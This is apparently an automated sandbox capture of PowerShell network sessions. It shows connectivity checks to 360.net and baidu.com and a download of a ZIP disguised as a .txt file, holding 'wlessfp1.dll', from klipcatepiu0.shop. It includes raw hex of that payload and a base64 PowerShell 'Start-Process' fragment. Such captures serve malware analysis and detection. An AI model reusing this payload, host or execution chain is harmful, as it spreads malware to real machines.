                                                                                                                                2024-12-08 00:46:26 UTC752INData Raw: 62 41 42 73 41 47 77 41 62 41 42 73 41 47 77 41 62 41 42 73 41 47 77 41 62 41 42 73 41 47 77 41 62 41 42 73 41 47 77 41 62 41 42 73 41 47 77 41 62 41 42 73 41 47 77 41 62 41 42 73 41 47 77 41 62 41 42 73 41 47 77 41 62 41 42 73 41 47 77 41 62 41 42 73 41 47 77 41 62 41 42 73 41 47 77 41 62 41 42 73 41 43 6b 41 49 41 42 37 41 41 6f 41 49 41 41 67 41 43 41 41 49 41 41 67 41 43 41 41 49 41 41 67 41 46 4d 41 64 41 42 68 41 48 49 41 64 41 41 74 41 46 41 41 63 67 42 76 41 47 4d 41 5a 51 42 7a 41 48 4d 41 49 41 41 74 41 45 59 41 61 51 42 73 41 47 55 41 55 41 42 68 41 48 51 41 61 41 41 67 41 43 51 41 65 41 42 34 41 48 67 41 65 41 42 34 41 48 67 41 65 41 42 34 41 48 67 41 65 41 42 34 41 48 67 41 65 41 42 34 41 48 67 41 65 41 42 34 41 48 67 41 65 41 42 34 41 48 67
                                                                                                                                Data Ascii: bABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsACkAIAB7AAoAIAAgACAAIAAgACAAIAAgAFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIAAtAEYAaQBsAGUAUABhAHQAaAAgACQAeAB4AHgAeAB4AHgAeAB4AHgAeAB4AHgAeAB4AHgAeAB4AHgAeAB4AHg


                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                11192.168.2.449949180.163.242.1024438132C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                2024-12-08 00:46:33 UTC61OUTGET / HTTP/1.1
                                                                                                                                Host: www.360.net
                                                                                                                                Connection: Keep-Alive
                                                                                                                                2024-12-08 00:46:33 UTC238INHTTP/1.1 301 Moved Permanently
                                                                                                                                Server: nginx/1.21.5
                                                                                                                                Date: Sun, 08 Dec 2024 00:46:33 GMT
                                                                                                                                Content-Type: text/html
                                                                                                                                Content-Length: 169
                                                                                                                                Connection: close
                                                                                                                                Location: https://360.net/
                                                                                                                                Content-Security-Policy: upgrade-insecure-requests
                                                                                                                                2024-12-08 00:46:33 UTC169INData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 32 31 2e 35 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx/1.21.5</center></body></html>


                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                12192.168.2.449959180.163.242.1024438132C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                2024-12-08 00:46:36 UTC57OUTGET / HTTP/1.1
                                                                                                                                Host: 360.net
                                                                                                                                Connection: Keep-Alive
                                                                                                                                2024-12-08 00:46:36 UTC416INHTTP/1.1 200 OK
                                                                                                                                Server: nginx/1.21.5
                                                                                                                                Date: Sun, 08 Dec 2024 00:46:36 GMT
                                                                                                                                Content-Type: text/html
                                                                                                                                Content-Length: 124419
                                                                                                                                Connection: close
                                                                                                                                Last-Modified: Thu, 05 Dec 2024 11:02:22 GMT
                                                                                                                                ETag: W/"6751883e-1e603"
                                                                                                                                Vary: Accept-Encoding
                                                                                                                                X-Varnish: 638916 345249
                                                                                                                                Age: 46
                                                                                                                                Via: 1.1 g-website-nginx-3099d1-v-6786f99fb8-5b6mk (Varnish/7.6)
                                                                                                                                Accept-Ranges: bytes
                                                                                                                                Content-Security-Policy: upgrade-insecure-requests
                                                                                                                                2024-12-08 00:46:36 UTC15968INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 7a 68 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 20 2f 3e 0a 3c 21 2d 2d 20 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 2c 20 6d 61 78 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2e 30 2c 20 75 73 65 72 2d 73 63 61 6c 61 62 6c 65 3d 30 3b 22 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 2f 3e 20 2d 2d 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 69 65 3d 65 64 67 65 22 20 2f 3e 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22
                                                                                                                                Data Ascii: <!DOCTYPE html><html lang="zh"><head><meta charset="UTF-8" />... <meta content="width=device-width, initial-scale=1.0, maximum-scale=1.0, user-scalable=0;" name="viewport" /> --><meta http-equiv="X-UA-Compatible" content="ie=edge" /><meta charset="


                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                13192.168.2.449970103.235.47.1884438132C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                2024-12-08 00:46:40 UTC63OUTGET / HTTP/1.1
                                                                                                                                Host: www.baidu.com
                                                                                                                                Connection: Keep-Alive
                                                                                                                                2024-12-08 00:46:40 UTC986INHTTP/1.1 200 OK
                                                                                                                                Accept-Ranges: bytes
                                                                                                                                Cache-Control: no-cache
                                                                                                                                Content-Length: 29490
                                                                                                                                Content-Type: text/html
                                                                                                                                Date: Sun, 08 Dec 2024 00:46:40 GMT
                                                                                                                                P3p: CP=" OTI DSP COR IVA OUR IND COM "
                                                                                                                                P3p: CP=" OTI DSP COR IVA OUR IND COM "
                                                                                                                                Pragma: no-cache
                                                                                                                                Server: BWS/1.1
                                                                                                                                Set-Cookie: BAIDUID=E26C2C9166356B0DC732DBC03301A5CD:FG=1; expires=Thu, 31-Dec-37 23:55:55 GMT; max-age=2147483647; path=/; domain=.baidu.com
                                                                                                                                Set-Cookie: BIDUPSID=E26C2C9166356B0DC732DBC03301A5CD; expires=Thu, 31-Dec-37 23:55:55 GMT; max-age=2147483647; path=/; domain=.baidu.com
                                                                                                                                Set-Cookie: PSTM=1733618800; expires=Thu, 31-Dec-37 23:55:55 GMT; max-age=2147483647; path=/; domain=.baidu.com
                                                                                                                                Set-Cookie: BAIDUID=E26C2C9166356B0D5B6E8F77B97BFACB:FG=1; max-age=31536000; expires=Mon, 08-Dec-25 00:46:40 GMT; domain=.baidu.com; path=/; version=1; comment=bd
                                                                                                                                Traceid: 173361880034675896429386455786182110118
                                                                                                                                Vary: Accept-Encoding
                                                                                                                                X-Ua-Compatible: IE=Edge,chrome=1
                                                                                                                                X-Xss-Protection: 1;mode=block
                                                                                                                                Connection: close
                                                                                                                                2024-12-08 00:46:40 UTC193INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 2c 63 68 72 6f 6d 65 3d 31 22 20 2f 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 61
                                                                                                                                Data Ascii: <!DOCTYPE html><html><head> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /> <meta http-equiv="X-UA-Compatible" content="IE=edge,chrome=1" /> <meta content="a
                                                                                                                                2024-12-08 00:46:40 UTC319INData Raw: 6c 77 61 79 73 22 20 6e 61 6d 65 3d 22 72 65 66 65 72 72 65 72 22 20 2f 3e 0a 20 20 20 20 3c 6d 65 74 61 0a 20 20 20 20 20 20 20 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 0a 20 20 20 20 20 20 20 20 63 6f 6e 74 65 6e 74 3d 22 e5 85 a8 e7 90 83 e9 a2 86 e5 85 88 e7 9a 84 e4 b8 ad e6 96 87 e6 90 9c e7 b4 a2 e5 bc 95 e6 93 8e e3 80 81 e8 87 b4 e5 8a 9b e4 ba 8e e8 ae a9 e7 bd 91 e6 b0 91 e6 9b b4 e4 be bf e6 8d b7 e5 9c b0 e8 8e b7 e5 8f 96 e4 bf a1 e6 81 af ef bc 8c e6 89 be e5 88 b0 e6 89 80 e6 b1 82 e3 80 82 e7 99 be e5 ba a6 e8 b6 85 e8 bf 87 e5 8d 83 e4 ba bf e7 9a 84 e4 b8 ad e6 96 87 e7 bd 91 e9 a1 b5 e6 95 b0 e6 8d ae e5 ba 93 ef bc 8c e5 8f af e4 bb a5 e7 9e ac e9 97 b4 e6 89 be e5 88 b0 e7 9b b8 e5 85 b3 e7 9a 84 e6 90 9c e7 b4 a2 e7
                                                                                                                                Data Ascii: lways" name="referrer" /> <meta name="description" content="
                                                                                                                                2024-12-08 00:46:40 UTC3537INData Raw: 2e 63 6f 6d 2f 66 61 76 69 63 6f 6e 2e 69 63 6f 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 20 2f 3e 0a 20 20 20 20 3c 6c 69 6e 6b 0a 20 20 20 20 20 20 20 20 72 65 6c 3d 22 73 65 61 72 63 68 22 0a 20 20 20 20 20 20 20 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6f 70 65 6e 73 65 61 72 63 68 64 65 73 63 72 69 70 74 69 6f 6e 2b 78 6d 6c 22 0a 20 20 20 20 20 20 20 20 68 72 65 66 3d 22 2f 2f 77 77 77 2e 62 61 69 64 75 2e 63 6f 6d 2f 63 6f 6e 74 65 6e 74 2d 73 65 61 72 63 68 2e 78 6d 6c 22 0a 20 20 20 20 20 20 20 20 74 69 74 6c 65 3d 22 e7 99 be e5 ba a6 e6 90 9c e7 b4 a2 22 0a 20 20 20 20 2f 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e e7 99 be e5 ba a6 e4 b8 80 e4 b8 8b ef bc 8c e4 bd a0 e5 b0 b1 e7 9f a5 e9 81 93 3c 2f 74 69 74 6c
                                                                                                                                Data Ascii: .com/favicon.ico" type="image/x-icon" /> <link rel="search" type="application/opensearchdescription+xml" href="//www.baidu.com/content-search.xml" title="" /> <title></titl
                                                                                                                                2024-12-08 00:46:40 UTC4716INData Raw: 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 2d 62 6f 74 74 6f 6d 3a 20 31 30 30 70 78 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 2a 7a 2d 69 6e 64 65 78 3a 20 31 3b 0a 20 20 20 20 20 20 20 20 7d 0a 0a 20 20 20 20 20 20 20 20 23 77 72 61 70 70 65 72 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 69 6e 2d 77 69 64 74 68 3a 20 31 32 35 30 70 78 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 68 65 69 67 68 74 3a 20 31 30 30 25 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 69 6e 2d 68 65 69 67 68 74 3a 20 36 30 30 70 78 3b 0a 20 20 20 20 20 20 20 20 7d 0a 0a 20 20 20 20 20 20 20 20 23 68 65 61 64 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 6f 73 69 74 69 6f 6e 3a
                                                                                                                                Data Ascii: padding-bottom: 100px; text-align: center; *z-index: 1; } #wrapper { min-width: 1250px; height: 100%; min-height: 600px; } #head { position:
                                                                                                                                2024-12-08 00:46:40 UTC5895INData Raw: 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 33 36 70 78 3b 0a 20 20 20 20 20 20 20 20 7d 0a 0a 20 20 20 20 20 20 20 20 23 73 2d 68 6f 74 73 65 61 72 63 68 2d 77 72 61 70 70 65 72 20 2e 73 2d 68 6f 74 73 65 61 72 63 68 2d 63 6f 6e 74 65 6e 74 20 2e 68 6f 74 73 65 61 72 63 68 2d 69 74 65 6d 2e 6f 64 64 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 20 32 30 70 78 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 63 6c 65 61 72 3a 20 62 6f 74 68 3b 0a 20 20 20 20 20 20 20 20 7d 0a 0a 20 20 20 20 20 20 20 20 23 73 2d 68 6f 74 73 65 61 72 63 68 2d 77 72 61 70 70 65 72 20 2e 73 2d 68 6f 74 73 65 61 72 63 68 2d 63 6f 6e 74 65 6e 74 20 2e 68 6f 74 73 65 61 72 63 68 2d 69 74 65 6d 2e 65 76 65 6e 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20
                                                                                                                                Data Ascii: line-height: 36px; } #s-hotsearch-wrapper .s-hotsearch-content .hotsearch-item.odd { margin-right: 20px; clear: both; } #s-hotsearch-wrapper .s-hotsearch-content .hotsearch-item.even {
                                                                                                                                2024-12-08 00:46:40 UTC3069INData Raw: 20 20 20 20 20 20 23 62 6f 74 74 6f 6d 5f 6c 61 79 65 72 20 61 3a 68 6f 76 65 72 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 32 32 32 3b 0a 20 20 20 20 20 20 20 20 7d 0a 0a 20 20 20 20 20 20 20 20 23 62 6f 74 74 6f 6d 5f 6c 61 79 65 72 20 2e 73 2d 62 6f 74 74 6f 6d 2d 6c 61 79 65 72 2d 63 6f 6e 74 65 6e 74 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0a 20 20 20 20 20 20 20 20 7d 0a 0a 20 20 20 20 20 20 20 20 40 66 6f 6e 74 2d 66 61 63 65 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 63 49 63 6f 6e 66 6f 6e 74 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 73 72 63 3a 20 75 72 6c 28 27 68 74 74 70 73 3a 2f 2f 70 73 73 2e 62 64 73 74 61 74 69
                                                                                                                                Data Ascii: #bottom_layer a:hover { color: #222; } #bottom_layer .s-bottom-layer-content { text-align: center; } @font-face { font-family: cIconfont; src: url('https://pss.bdstati
                                                                                                                                2024-12-08 00:46:41 UTC8253INData Raw: 78 69 62 6c 65 2f 6c 6f 67 6f 2f 70 63 2f 69 6e 64 65 78 2e 70 6e 67 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 77 69 64 74 68 3d 22 32 37 30 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 68 65 69 67 68 74 3d 22 31 32 39 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 75 73 65 6d 61 70 3d 22 23 6d 70 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 2f 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 6d 61 70 20 6e 61 6d 65 3d 22 6d 70 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                                                                Data Ascii: xible/logo/pc/index.png" width="270" height="129" usemap="#mp" /> <map name="mp">
                                                                                                                                2024-12-08 00:46:41 UTC3267INData Raw: 76 65 6e 22 20 64 61 74 61 2d 69 6e 64 65 78 3d 22 38 22 3e 3c 61 20 63 6c 61 73 73 3d 22 74 69 74 6c 65 2d 63 6f 6e 74 65 6e 74 20 74 61 67 2d 77 69 64 74 68 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 62 61 69 64 75 2e 63 6f 6d 2f 73 3f 77 64 3d 25 45 37 25 38 46 25 41 44 25 45 34 25 42 38 25 42 42 25 45 34 25 42 42 25 42 42 25 45 34 25 42 38 25 38 44 25 45 35 25 38 37 25 38 36 31 35 25 45 35 25 42 32 25 38 31 25 45 37 25 39 34 25 42 37 25 45 37 25 39 34 25 39 46 25 45 36 25 39 39 25 39 41 25 45 38 25 38 37 25 41 41 25 45 34 25 42 39 25 41 30 25 45 34 25 42 38 25 38 41 25 45 35 25 38 45 25 39 35 25 45 36 25 38 39 25 38 30 26 73 61 3d 69 70 63 5f 68 6f 6d 65 5f 68 6f 74 77 6f 72 64 5f 6a 74 26 72 73 76 5f 64 6c 3d 69 70 63 5f 68 6f 6d 65
                                                                                                                                Data Ascii: ven" data-index="8"><a class="title-content tag-width" href="https://www.baidu.com/s?wd=%E7%8F%AD%E4%B8%BB%E4%BB%BB%E4%B8%8D%E5%87%8615%E5%B2%81%E7%94%B7%E7%94%9F%E6%99%9A%E8%87%AA%E4%B9%A0%E4%B8%8A%E5%8E%95%E6%89%80&sa=ipc_home_hotword_jt&rsv_dl=ipc_home
                                                                                                                                2024-12-08 00:46:41 UTC241INData Raw: 3e 0a 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0a 20 20 20 20 3c 2f 64 69 76 3e 0a 20 20 20 20 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 0a 20 20 20 20 20 20 20 20 76 61 72 20 64 61 74 65 20 3d 20 6e 65 77 20 44 61 74 65 28 29 3b 0a 20 20 20 20 20 20 20 20 76 61 72 20 79 65 61 72 20 3d 20 64 61 74 65 2e 67 65 74 46 75 6c 6c 59 65 61 72 28 29 3b 0a 20 20 20 20 20 20 20 20 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 27 79 65 61 72 27 29 2e 69 6e 6e 65 72 54 65 78 74 20 3d 20 27 c2 a9 27 20 2b 20 79 65 61 72 20 2b 20 27 20 42 61 69 64 75 20 27 3b 0a 20 20 20 20 3c 2f 73 63 72 69 70 74 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a
                                                                                                                                Data Ascii: > </div> </div> <script type="text/javascript"> var date = new Date(); var year = date.getFullYear(); document.getElementById('year').innerText = '' + year + ' Baidu '; </script></body></html>


                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                14192.168.2.449979104.21.26.1274438132C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                2024-12-08 00:46:43 UTC82OUTGET /int_clp_sha.txt HTTP/1.1
                                                                                                                                Host: klipcatepiu0.shop
                                                                                                                                Connection: Keep-Alive
                                                                                                                                2024-12-08 00:46:43 UTC912INHTTP/1.1 200 OK
                                                                                                                                Date: Sun, 08 Dec 2024 00:46:43 GMT
                                                                                                                                Content-Type: text/plain
                                                                                                                                Content-Length: 19433880
                                                                                                                                Connection: close
                                                                                                                                Accept-Ranges: bytes
                                                                                                                                ETag: "42ae2f7da9547621cb950b619b792d53"
                                                                                                                                Last-Modified: Thu, 05 Dec 2024 12:14:24 GMT
                                                                                                                                Vary: Accept-Encoding
                                                                                                                                CF-Cache-Status: DYNAMIC
                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2Fo4pUhKMj9r8%2BYhR2g1V%2BdF4MfLskAXEYmjlKhItXN3iDWQF2MeOpHfHcrx2veG4GdBFvDWLpOA6R%2BbJNp3HKg3aMPG05nxnlIaBQD8KiSxIdcdzVrx6EGmU2KqxoNSK8dpetA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                Server: cloudflare
                                                                                                                                CF-RAY: 8ee8bd726ccb43e8-EWR
                                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=1598&min_rtt=1590&rtt_var=614&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2868&recv_bytes=696&delivery_rate=1757977&cwnd=214&unsent_bytes=0&cid=79abba172a6c5c9a&ts=599&x=0"
                                                                                                                                2024-12-08 00:46:43 UTC457INData Raw: 50 4b 03 04 14 00 08 00 08 00 a0 63 85 59 00 00 00 00 00 00 00 00 a8 19 01 00 0c 00 20 00 77 6c 65 73 73 66 70 31 2e 64 6c 6c 55 54 0d 00 07 7d 8e 51 67 7d 8e 51 67 7d 8e 51 67 75 78 0b 00 01 04 00 00 00 00 04 00 00 00 00 ec bd 79 5c 54 d5 fb 00 7c 67 01 2e 32 30 a3 0e 36 ea a8 93 8e 86 82 8a 81 86 0e 2a 28 cb 68 28 33 6c e3 0a 2e 80 23 22 2a cc 08 16 a1 34 8c 39 dc a6 b4 b2 ac 6f a5 a5 95 95 99 b9 92 9a b1 28 e0 8e e0 ae 19 9a d9 45 34 31 4d 71 9d f7 79 ce bd c3 96 d5 ef fb fb bd ef e7 fd c7 e1 f3 cc b9 67 7f ce 79 96 f3 3c e7 9c 3b 8c 9b b4 9c 12 51 14 25 06 70 38 28 aa 88 e2 3e 21 d4 bf 7f 1a 01 bc 7a ec f4 a2 b6 ba 1f 7e b6 48 10 75 f8 d9 38 e3 ec 2c d5 fc cc 79 b3 32 a7 cf 55 cd 9c 9e 91 31 cf a4 9a 91 a2 ca 34 67 a8 66 67 a8 c2 a2 63 55 73 e7 25 a7
                                                                                                                                Data Ascii: PKcY wlessfp1.dllUT}Qg}Qg}Qguxy\T|g.206*(h(3l.#"*49o(E41Mqygy<;Q%p8(>!z~Hu8,y2U14gfgcUs%
                                                                                                                                2024-12-08 00:46:43 UTC1369INData Raw: 49 e9 a8 a6 39 71 7e a0 df 90 01 5c 31 ea 36 8c 89 aa e2 db aa fa 4b b9 e2 01 99 59 99 33 29 7e ac b5 7c b9 da 27 b4 97 99 92 3e 0f 0a ca dd 29 32 07 a4 5c c3 5f ca 8d a2 9e 7e 9e 7e 9e 7e 9e 7e 9e 7e 9e 7e 9e 7e 9e 7e 9e 7e 9e 7e 9e 7e 9e 7e 9e 7e fe ab 8f e5 9a 1f 13 a6 0e 64 68 46 27 0e 28 d6 e9 6c 51 6a 09 13 a5 0e d2 db e2 d4 72 9d 3d 4e 2d 8b d1 55 84 a9 15 3e 50 36 15 1e d4 02 12 f4 51 51 b6 30 b5 0f 80 1f 80 3f 40 20 40 10 40 b0 c3 1b fc 44 99 65 af 5f d9 21 f8 58 ae d1 d0 be 0c da 0f 11 5b 8b 6d 12 35 14 11 e7 b9 de 3d 8d 21 e4 48 ec 72 75 8c 8e 35 3b 1c 0e cb 5e 59 d9 a1 04 c6 a4 a6 0d 4c c9 f7 e0 86 53 4c e3 ad cf 92 12 4b c5 d4 a1 a6 0f c9 0f 28 0e 72 35 0d 88 8d 37 30 0e a6 ca f2 c7 4d cb a5 1e 85 ca 76 85 72 7f e9 9e fb d2 ed f5 9a 1b 26 97
                                                                                                                                Data Ascii: I9q~\16KY3)~|'>)2\_~~~~~~~~~~~~~dhF'(lQjr=N-U>P6QQ0?@ @@De_!X[m5=!Hru5;^YLSLK(r570Mvr&
                                                                                                                                2024-12-08 00:46:43 UTC1369INData Raw: 1e 92 f9 08 96 0b c6 25 5b c8 51 4b c9 fe c8 51 4b 62 2d d6 73 92 90 01 09 49 9c 28 f8 73 e3 e5 fa 0f 8c 8d 07 f4 eb 02 ce 71 22 08 75 fc 80 0b 94 d0 b8 24 06 22 2a c4 23 98 08 a5 6e 0f e2 65 5c 85 3d 1e 4e b5 99 d4 c1 c4 16 98 02 5c 35 45 ed 8f 6a 40 c9 6a a1 17 50 96 93 53 87 9a 40 4d c5 81 06 d4 6a 6e e5 75 c5 f5 10 59 45 9b 10 03 bc 42 11 9d 23 01 a4 b3 1f 23 1f c8 41 98 fc f2 09 ff c8 ed 3a 61 bd ab fd 3f 28 18 a9 0c 6d 29 16 a6 6a 0e 9a ff f4 2d 3d d6 68 29 77 68 ca a5 ef 96 a1 36 d0 33 87 d9 8f ee c3 a4 4e e5 07 84 2b 01 8c 07 26 89 5b 43 40 c1 39 15 98 53 93 a4 f2 d3 f7 17 35 e9 54 68 58 60 18 af ba 24 69 82 b4 f9 2d f4 63 d9 a1 ff f7 db 5f f0 d7 f6 19 ce b8 52 90 f9 76 6a 61 b4 cc 6c 72 35 d4 0c 84 47 55 0c a6 db 09 af 8a d3 e6 a0 16 54 89 50 52
                                                                                                                                Data Ascii: %[QKQKb-sI(sq"u$"*#ne\=N\5Ej@jPS@MjnuYEB##A:a?(m)j-=h)wh63N+&[C@9S5ThX`$i-c_Rvjalr5GUTPR
                                                                                                                                2024-12-08 00:46:43 UTC1369INData Raw: 54 d8 12 95 b6 0c b9 c3 3b 84 33 3e 95 36 6e fb 05 d5 1f a8 2f 95 3d 4f 6c 58 16 21 c0 1c 63 23 d0 71 59 77 cc 95 c4 42 36 d0 4e 68 eb c1 b8 69 ca a4 05 0e 34 88 69 a6 bd 3d 91 8e 35 1a 91 de 24 df b5 42 44 dc bb 91 e0 05 d2 f6 44 49 2c 59 7f 0c e8 e4 39 f3 70 e7 46 5a f0 23 3e 69 e0 61 3b 7a be 7e ec f1 30 9e 3d a4 05 eb 20 25 21 9e a9 64 97 a3 4d 03 b6 96 b4 60 05 b6 09 5e a6 0c ac a6 51 12 b2 35 b1 c8 1e ad 40 3b a7 eb 0d 87 63 49 ae 5a 45 15 ed 06 86 32 bb 14 6d 80 40 67 b4 12 17 81 b5 37 40 13 22 f0 cf 3a c0 0c cb f5 46 85 13 53 f3 50 a7 7f a9 e2 e2 dd 78 2f 96 b7 8a d0 85 7b c8 e5 88 ca 5d 05 2d 9d 51 18 9a 96 86 21 25 31 e5 89 53 27 b7 56 d7 87 f4 b1 09 cc e0 65 68 bf 19 59 64 70 de df 75 9c 04 ce 90 1b 1c 27 49 aa e3 24 58 57 af a3 cd 55 0c 2c e9
                                                                                                                                Data Ascii: T;3>6n/=OlX!c#qYwB6Nhi4i=5$BDDI,Y9pFZ#>ia;z~0= %!dM`^Q5@;cIZE2m@g7@":FSPx/{]-Q!%1S'VehYdpu'I$XWU,
                                                                                                                                2024-12-08 00:46:43 UTC1369INData Raw: 03 99 6e cd 83 92 89 4a 88 45 16 21 11 95 c4 eb 44 f7 1c 35 dc 88 3a 30 11 72 4b b9 1c fa 38 d5 34 a6 29 50 0e c7 f5 3b 3f ae 17 b1 09 7b 14 4d c6 f5 3f 1f 15 22 f9 8f a3 fa 9c 1f 15 1e b2 80 d4 12 43 30 06 47 e5 d6 62 54 cd 1f cb b5 e0 d4 7c cd b8 49 b0 5e 4a ad 0f 90 d6 a3 83 ed e9 0a b1 74 47 b8 30 60 7f aa a6 44 ba f4 57 14 f4 28 62 5e 4a 96 33 2f 06 8b 20 4c 43 76 55 db b7 76 c6 3b cd 31 b8 2d ff 3d f8 1e 94 3d 17 0c 89 5b 9f 39 bc 15 dc 1c 05 81 32 04 63 2a 8a 2a 87 12 94 09 f4 50 bd 2b 6e cf f9 96 d8 03 15 4c 78 ae a6 24 33 90 59 89 d7 64 81 29 fd 45 55 a2 7b 9a 53 d9 3d a1 e2 04 c0 3f 0e 77 ce e2 62 f4 09 a2 72 d6 4c 16 0b 54 c4 53 20 d1 8f b1 9e 87 3a 50 db 9f 59 59 db ba 76 f7 27 d4 9e f5 c8 59 1b 0f a0 64 d2 1d f1 42 0b 48 a3 0f 48 b2 a6 14 29
                                                                                                                                Data Ascii: nJE!D5:0rK84)P;?{M?"C0GbT|I^JtG0`DW(b^J3/ LCvUv;1-==[92c**P+nLx$3Yd)EU{S=?wbrLTS :PYYv'YdBHH)
